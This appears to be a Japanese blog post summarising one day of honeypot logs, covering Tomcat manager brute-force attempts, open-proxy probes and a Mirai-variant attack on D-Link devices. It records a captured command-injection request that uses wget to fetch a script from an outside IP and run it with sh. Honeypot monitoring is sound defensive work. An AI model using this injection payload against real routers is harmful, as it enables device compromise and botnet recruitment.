ハニーポットのログ分析(2018/09/28)
WOWhoneypotの2018/09/28(金) (運用115日目)の簡易分析です。
本日の総アクセス件数は 88件です。
主なアクセスは以下となります。
・Tomcat管理ページへのブルートフォース攻撃:51件
・不正中継の調査:7件
(新規2件)
HEAD /images/banner.png HTTP/1.1
Host: api.utm999.comHEAD /images/sql2008.png HTTP/1.1
Host: admx.utm999.comHEAD /static/admin/images/login_logo.png HTTP/1.1
Host: jf.utmtoken.com
・D-Linkを狙うMirai亜種:1件
→User-Agent: Gemini/2.0
以下が全アクセスログです。
| 件数 | 日付 | 種別 | リクエスト |
| 51 | 2018-09-28 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 27 | 2018-09-28 | アクセス | GET / |
| 2 | 2018-09-28 | 不正中継の調査 | GET hxxp://www.baidu.com/ |
| 2 | 2018-09-28 | 不正中継の調査 | CONNECT www.baidu.com:443 |
| 1 | 2018-09-28 | 不正中継の調査 | HEAD /static/admin/images/login_logo.png |
| 1 | 2018-09-28 | 不正中継の調査 | HEAD /images/sql2008.png |
| 1 | 2018-09-28 | 不正中継の調査 | HEAD /images/banner.png |
| 1 | 2018-09-28 | 調査 | HEAD / |
| 1 | 2018-09-28 | クローリング | GET /robots.txt |
| 1 | 2018-09-28 | D-Linkを狙うMirai亜種 | GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://159.89.204.166/d%20-O%20-%3E%20/tmp/ds;sh%20/tmp/ds%27$ |
本日のドメイン名でのアクセスは以下です。
4 GET /
2 GET /robots.txt
本日のハンティングログは以下です。
1 2018-09-28 wget hxxp://159.89.204.166/d
以上です。
